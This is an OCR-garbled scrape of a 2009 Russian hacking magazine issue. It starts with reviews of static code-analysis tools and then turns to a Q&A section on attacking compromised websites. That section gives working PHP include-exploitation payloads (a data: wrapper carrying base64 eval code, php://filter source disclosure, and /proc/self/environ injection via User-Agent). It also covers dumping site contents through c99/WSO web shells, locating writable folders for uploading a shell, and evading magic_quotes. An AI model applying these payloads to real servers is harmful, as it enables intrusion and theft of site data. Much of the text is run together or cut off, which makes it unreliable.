книги хакеры / журнал хакер / 131_Optimized

ФРОНТЕНДДЛЯYASCA

команды (access(), chown(), chgrp(), chmod(), tmpfile(), tmpnam(), tempnam(), mktemp()), а

также команды системных вызовов (exec(), system(), popen()). Вручную исследовать весь код (особенно, если он состоит из нескольких тысяч строк) довольно утомительно. А значит, можно без труда проглядеть передачу какой-нибудь функции непроверенных параметров. Значительно облегчить задачу могут специальные средства для аудита, в том числе, известная утилита RATS (Rough Auditing Tool for Security) от известной компа-

нии Fortify. Она не только успешно справится с обработкой кода, написанного на C/C++, но сможет обработать еще и скрипты на Perl, PHP и Python. В базе утилиты находится внушающая подборка с детальным описанием проблемных мест в коде. С помощью анализатора она обработает скормленный ей сорец и попытается выявить баги, после чего выдаст информацию о найденных недочетах. RATS работает через командную строку, как под Windows, так и *nix-системами.

С++, PHP, Python, Ruby

Yasca www.yasca.org Open Source Unix, Windows

Yasca так же, как и RATS, не нуждается в установке, при этом имеет не только консольный интерфейс, но и простенький GUI.

Разработчики рекомендуют запускать утилиту через консоль — мол, так возможностей больше. Забавно, что движок Yasca написан на PHP 5.2.5, причем интерпретатор (в самом урезанном варианте) лежит в одной из подпапок архива с программой. Вся программа логически состоит из фронтенда, набора сканирующих плагинов, генератора отчета и собственно движка, который заставляет все

ПОТЕНЦИАЛЬНООПАСНЫЕКОНСТРУКЦИИВОТЧЕТЕGRAUDIT ВЫДЕЛЕНЫКРАСНЫМ

шестеренки вращаться вместе. Плагины свалены в директорию plugins — туда же нужно устанавливать и дополнительные аддоны.

Важный момент! Трое из стандартных плагинов, которые входят в состав Yasca, имеют неприятные зависимости. JLint, который сканирует Java’овские .class-файлы, требует наличия jlint.exe в директории resource/ utility. Второй плагин — antiC, используемый для анализа сорцов Java и C/C++, требует antic.exe в той же директории. А для работы PMD, который обрабатывает Java-код, необходима установленная в системе Java JRE 1.4 или выше. Проверить правильность установки можно, набрав команду «yasca ./ resources/test/». Как выглядит сканирование? Обработав скормленные программе сорцы, Yasca выдает результат в виде специального отчета. Например, один из стандартных плагинов GREP позволяет с помощью паттернов, описанных в .grep файлах, указать уязвимые конструкции и легко выявлять целый ряд уязвимостей. Набор таких паттернов уже включен в программу: для поиска слабого шифрования, авторизации по «пароль равен логину», возможных SQL-инъекций и много чего еще. Когда же в отчете захочется увидеть более детальную информацию, не поленись установить дополнительные плагины. Чего стоит одно то, что с их помощью можно дополнительно просканировать код на .NET (VB.NET, C#, ASP.NET), PHP, ColdFusion, COBOL, HTML, JavaScript, CSS, Visual Basic, ASP, Python, Perl.

С++, Java, .NET, ASP, Perl, PHP, Python и

другие

Cppcheck cppcheck.wiki.sourceforge. net

Open Source

Unix, Windows

Разработчики Cppcheck решили не разбрасываться по мелочам, а потому отлавливают только строго определенные категории багов и только в коде на С++. Не жди, что программа продублирует предупреждения компилятора — он обойдется без суфлера. Поэтому не поленись поставить для компилятора максимальный уровень предупреждений, а с помощью Cppcheck проверь наличие утечек памяти, нарушений операций allocationdeallocation, различных переполнений буфера, использования устаревших функций и многого другого. Важная деталь: разработчики Cppcheck постарались свести количество ложных срабатываний к минимуму. Поэтому, если прога фиксирует ошибку, можно с большой вероятностью сказать: «Она действительно есть!» Запустить анализ можно как из-под консоли, так и с помощью приятного GUI-интерфейса, написанного на Qt и работающего под любой платформой.

С++

QT-ИНТЕРФЕЙСCPPCHECK

graudit www.justanotherhacker.

com/projects/graudit.html Open Source

Unix, Windows

Этот простой скрипт, совмещенный с набором сигнатур, позволяет найти ряд критических уязвимостей в коде, причем поиск осуществляется с помощью всем известной утилиты grep. О GUI-интерфейсе тут неуместно даже упоминать: все осуществляется через консоль. Для запуска есть несколько ключей, но в самом простом случае достаточно указать в качестве параметра путь к исходникам:

graudit /path/to/scan

Наградой за старание будет цветастый отчет о потенциально эксплуатируемых местах в коде.

XML-ФОРМАТДЛЯОПИСАНИЯ СИГНАТУРВSWAAT

Надо сказать, что, помимо самого скрипта (а это всего 100 строчек кода на Bash), ценность представляют сигнатурные базы, в которых собраны регекспы и названия потенциально уязвимых функций в разных языках. По умолчанию вклю-

чены базы для Python, Perl, PHP, C++ — можно взять файлы из папки signatures и использовать в своих собственных разработках.

C++, PHP, Python, Perl

SWAAT www.owasp.org

Open Source

Unix, Windows

Если в graudit для задания сигнатуры уязвимости используются текстовые файлы, то в SWAAT — более прогрессивный подход с помощью XML-файлов. Вот так выглядит типичная сигнатура:

vuln match — регулярное выражение для поиска;

PC_ZONE

dvd

Ищинадискеподборкуутилитдлястатическогоанализа кода!

АНАЛИЗИРУЕМJAVA-ПРОЕКТВOUNCE 6

•command execution;

•directory traversal;

•globals overwrite;

•include;

•SQL-injection;

•miscellaneous.

Забавно, что прога написана на PHP/WinBinder (winbinder.org) и скомпилирована bamcompile (www. bambalam.se/bamcompile), поэтому выглядит так же, как и обычное Windows-приложение. Через удобный интерфейс пентестер может включить или отключить анализ кода на наличие тех или иных уязвимостей.

PHP

Pixy pixybox.seclab.tuwien.ac.at Freeware

Unix, Windows

В основе работы инструмента — сканирование исходного кода и построение графов потоков данных. По такому графу прослеживается путь данных, которые поступают извне программы — от пользователя, из базы данных, от какого-нибудь внешнего плагина и т.п. Таким образом строится список уязвимых точек (или входов) в приложениях. С помощью паттернов, описывающих уязвимость,

Pixy проверяет такие точки и позволяет определить XSS- и SQL-уязвимости. Причем сами графы, которые строятся во время анализа, можно посмотреть в папке graphs (напри-

мер, xss_file.php_1_dep.dot) — это очень полезно для того чтобы понять, почему именно тот или иной участок кода считается Pixy-уязвимым. Вообще, сама разработка крайне познавательна и демонстрирует, как работают продвинутые утилиты для статического анализа кода. На страничке документации (pixybox.seclab.tuwien.ac.at/pixy/ documentation.php) разработчик доходчиво рассказывает о разных этапах работы программы, объясняет логику и

алгоритм того, как должен анализироваться прогой тот или иной фрагмент кода. Сама программа написана на Java и распространяется в открытых исходниках, а на домашней страничке есть даже простенький онлайн-сервис для проверки кода на XSS-уязвимости.

PHP

Ounce 6 www.ouncelabs.com/products Shareware

Windows

Увы, существующие бесплатные решения пока на голову ниже, чем коммерческие аналоги. Достаточно изучить

ОТЧЕТCORE CRAWLER’АОСКАНИ-

РОВАНИИИСХОДНИКАНАC#

качество и детальность отчета, который составляет Ounce 6 — и понять, почему. В основе программы лежит специальный анализирующий движок Ounce Core, который проверяет код на соответствие правилам и политикам, составленным командой профессиональных пентестеров, аккумулировавших опыт известных security-компаний, хакерского комьюнити, а также стандартов безопасности. Программа определяет самые разные уязвимости в коде: от переполнения буфера до SQL-инъекций. При желании Ounce несложно интегрируется с популярными IDE, чтобы реализовать автоматическую проверку кода во время сборки каждого нового билда разрабатываемого приложения. Кстати говоря, компанию-разработчика

— Ounce Labs — летом этого года приобрела сама IBM. Так что продукт, скорее всего, продолжит развитие уже как часть одного из коммерческих приложений IBM.

Klocwork Insight www.klocwork.com Shareware Windows

Долгое время этот, опять же, коммерческий продукт реализовал статическое сканирование кода только для C, C+ и Java. Но как только вышли Visual Studio 2008 и .NET Framework 3.5, разработчики заявили о поддержке C#. Я прогнал программу на двух своих вспомогательных проектах, которые на скорую руку написал на «шарпе», и программа выявила 7 критических уязвимостей. Хорошо, что они написаны исключительно для внутреннего использования :). Klocwork Insight изначально настроен, прежде всего, на работу в связке с интегрированными средами разработки.

Интеграция с теми же Visual Studio или Eclipse выполнена чрезвычайно удачно — начинаешь всерьез задумываться, что такая функциональность должна быть реализована в них по умолчанию :). Если не брать в расчет проблемы с логикой работы приложения и проблемы с быстродействием, то Klocwork Insight отлично справляется с поиском переполнения буфера, отсутствия фильтрации пользовательского кода, возможности SQL/Path/Cross-site инъекций, слабого шифрования и т.п. Еще одна интересная опция — построение дерева выполнения приложения, позволяющего

XÀÊÅÐ 11 /131/ 09

ВЗЛОМ

JOKESTER FORUM.ANTICHAT.RU

TWOSTER ANTIQWERTY@GMAIL.COM, TWOST.RU

ЗАДАЧА: ЯПРОЧЕЛСТАТЬЮОСПОСО- ¹ 3 БАХРАСКРУТКИИНКЛУДОВ, ОДНАКО

ДАННЫЕСПОСОБЫМНЕНЕПОМОГЛИ, КАКБЫТЬ?

РЕШЕНИЕ:

Естьещенескольковариантов, ноонитребуют«особыхусловий» дляреализации. Докручиватьинклудмыбудемдвумяспособами— спомощью такназываемого«упаковщика» data ифильтровfilter. Разберемподробнее.

1. Могучий data.

Требованиядляиспользованияметода:

a)allow_url_include должна быть включена. (allow_url_ include = on в файле php.ini)

b)Отсутствие символов перед нашим значением, т.е. include('./dir/'.$file); не подходит, а include($file); отлично подойдет!

Это, конечноже, немногоосложняетситуацию, однако, еслистояткакиелибофильтрынаприсутствиеслов«http://», «ftp://» ит.п., то, естественно, провестиRFI неудастся, тут-тонамипригодитсяданныйметод.

Кпримеру, еслиунасестьуязвимыйкод:

<?php include $_GET["file"]; ?>

Смелосоставляемзапрос

?file=data:application/x-httpd-php;base64,PD8gZXZhbCgk X0dFVFsnY29kZSddKTsgPz4&code=phpinfo();

Разберемподробнее:

data — непосредственно указывает, что будем использовать "упаковщик" data

application/x-httpd-php указывает mime-тип данных, в нашем случае это тип данных php-скрипта

base64 — указывает, что входящие данные зашифрованы в base64

PD8gZXZhbCgkX0dFVFsnY29kZSddKTsgPz4 — входящие данные (после расшифровки "<? eval($_GET['code']); ?>") code=phpinfo(); — переменная, используемая в eval

Выполняемзапросисозерцаемзаветныйphpinfo().

2. Фильтруем базар или удобный filter. Требованиядляиспользованияметода:

a)Отсутствие символов ПЕРЕД нашим значением в инклуде (аналогично первому методу).

b)Наличие соответствующего фильтра (для просмотра установленных фильтров использовать функцию stream_get_ filters).

3) PHP версии 5.0.0 и выше.

Уязвимыйкод:

<?php include $_GET["file"]; ?>

Составляемзапрос:

?file=php://filter/convert.base64-encode/resource=/ home/user/www/index.php

Разборполетов:

Зачтоборолись, натоинапоролись:)

php://filter — указывает, что используются фильтры convert — указывает, используются преобразовывающие фильтры

base64-encode — указывается сам фильтр

resource — указывается расположение требуемого файла

Результатомданногозапросамыполучимисходныйкодфайлаindex. php, зашифрованныйbase64, останетсялишьрасшифроватьиизучать исходныйкоднедруга.

Почитатьподробнееоданныхфункцияхможнонаphp.net

¹ 4 ЗАДАЧА: СДЕЛАТЬРИПСАЙТА

РЕШЕНИЕ:

Давай рассмотрим, как же можно сделать рип сайта без лишнего геморроя.

1.Начать, я думаю, нужно как всегда с инструментов, встроенных в сами шеллы. Тут можно говорить только о c99 и wso шеллах (из популярных). r57, к сожалению, никаких инструментов для рипа не предоставляет. Итак, что же мы делаем. В с99 просто отмечаем галочками файлы и папки, которые необходимо упаковать в выпадающем меню, снизу выбираем copy и жмем «Confirm». После этого появится меню c пимпой «Pack buffer to arhive» и полем с названием архива, в которое можно ввести так же и путь. Все, теперь у нас есть архив.

В wso-шелле все не так просто. Необходим PHP версии > 5. Но, в общем и целом, также отмечаем галочками нужный контент, выбираем из списка внизу «compress / zip» и жмем «>>». Затем переходим в папку, куда нужно сохранить архив, выбираем в меню «paste / zip» и сохраняем. Скажу по секрету, в этом шелле скоро будет сделан удобный рип, т.к. я общался с oRb’ом и он согласился, что дело это нужное и полезное, и пообещал включить в следующий релиз шелла достойную и удобную поддержку архивации. Так что — следи за релизами wso.

Все это вроде бы удобно, но медленно и без возможности ставить маски. В дополнение к минусам — шелл не пойдет по вложенным папкам, если в них нужно упаковать не все, да и процесс проставления галочек на нужных файлах далек от идеала. Особенно, если файлов паковать много, и они смешаны с ненужными.

2.С шеллами покончили, рассмотрим, какие возможности нам предлагает альтернативный софт.

На глаза попался скрипт AlfaUngzipper (alfaungzipper.com/ru).

Это бесплатная софтина на PHP состоит из одного единственного файла, поддерживает великий и могучий и имеет приятную морду и несколько полезных настроек. Для работы скрипту нужен PHP (версий 4.3.2 >= 5.2.5) и zlib. В настройках можно указать рабочую дирректорию, ходить или нет по вложенным папкам, имеются исключения папок и фильтр по расширению файла. Запакуется все в отдельный файл с собственным расширением .auae.

Процесс распаковки также достаточно прост и понятен и, в сущности, сводится к нажатию нашей горячо любимой кнопочки «next». На сайте есть описание и демо-версия, можешь для начала посмотреть и даже попробовать все возможности прямо на сайте.

Из плюсов можно заметить, что PHP наплевать на ограничения, налагаемые на сервере злобными админами, старающимися усложнить нам жизнь. А в частности, отключение многих нужных и полезных функций, которые не дают нормально работать шеллам, для нее не помеха, архивация идет с помощью php-функции gzwrite().

Из минусов, опять же, скорость ну и то, что это дополнительный файл, который нужно аплоадить на шелл.

3.Ну и, наконец, переходим к самым мощным средствам, предоставляемым самой осью. Это утилита tar.

Все опции я, разумеется, описывать не буду, достаточно несколько примеров. А самые дотошные смогут самостоятельно прочитать хелп с довольно внушительным списком опций.

Итак, примеры:

Запаковать папку www со всеми вложенными файлами в файл 1.tar

tar -cf 1.tar /www/

РипсайтачерезшеллWSO

УстановкаAlfaUngzipper нахост(рипсайта)

Рипсайтачерезшеллc99

Запаковать папку www со всеми вложенными файлами и файл lol.php из текущей папки в файл 1.tar

tar -cf 1.tar /www/ lol.php

Запаковать папку "/usr/home/www/» и сжать архив gzip’ом в файл "/usr/home/images/1.tar.gz"

tar -czf "/usr/home/images/1.tar.gz» «/usr/home/liona/ shop.faberlic-msk.ru/www/"

Запаковать все php-файлы и картинки jpg из текущей диры и сжать архив bzip2’ом в файл abc.tar.bz2

tar -cjf abc.tar.bz2 *.php *.jpg

Тут применимы любые конвейерные конструкции, вроде:

Найти в текущей дире и всех вложенных скрипты php, упаковать, ужать gzip’ом в файл a.tar.gz

find . -name '*.php' | tar -czvf a.tar.gz -T — --no- recursion

¹ 5 ЗАДАЧА: НАЙТИПАПКУСПРАВАМИНА

ЗАПИСЬНАСКОМПРОМЕТИРОВАННОМ СЕРВЕРЕ

РЕШЕНИЕ:

Наверное,тынеразсталкивалсястакойпроблемой,какпоискдоступнойна записьпапки.Допустим,утебяестьsql-инъекциясfile_priv,акудазаливать шелл—поканепонятно.

Чтожеделатьвтакомслучае?Ксожалению,ничегокардинального,позволяющегосо100%вероятностьюнайтитакуюпапку,нет,новотоблегчитьпоискя тебепомогу.

1. Для начала осматриваем ресурс на наличие загрузок. Картинки, аватарки, еще какие-нибудь файлы. Если такая возможность существует, грузим то, что разрешено, и смотрим, куда это сохранилось. Скорее всего, папка, в которую мы смогли загрузить картинки, как раз и будет доступна на запись.

2. Неплохо было бы просканировать сайт каким-нибудь сканером директорий и обратить внимание на такие каталоги, как cache, caches, uploads, download, avatars, images, tmp, temp и т.д. Вообще, такие папки надо про-

сматривать в первую очередь (они присутствуют довольно часто и нередко как раз доступны на запись ). Вот парочка онлайн-сканеров, которые тебе в этом помогут:

можемлегковоспользоватьсяпоиском.Находимвтекущейдиректориипапки справаминазапись:

system(‘find . -perm -2 -type d -ls’);

Бывает,чтокакие-тофункцииотключены(смотриphpinfo(),разделdisable_ functions).Помни,чтосистемныекомандыможновыполнятьнетолькочерез system(),такжеотличноподходитpassthru(),shell_exec()ит.д.

6. Есть еще одна штука — magic_quotes_gpc. Она многим портит жизнь. Если выполнить «system(ls)» можно при любых значениях, то «system(ls -la)» просто так не осуществить. В этом случае многие забывают такую классную штуку, как chr.

system('ls -lia') === system(chr(108).chr(115).chr(32). chr(45).chr(108).chr(105).chr(97))

Синклудомситуацияполностьюаналогична.Допустим,утебяLFIивозможностьпроинклудитьenviron.Чтомыделаем?Посылаемтакойзапрос:

file.php?file=../../../../../../../../../../../proc/ self/environ

User-Agent: <?php system(‘ls -lia’); ?>

—наблюдаемлистингдиректории.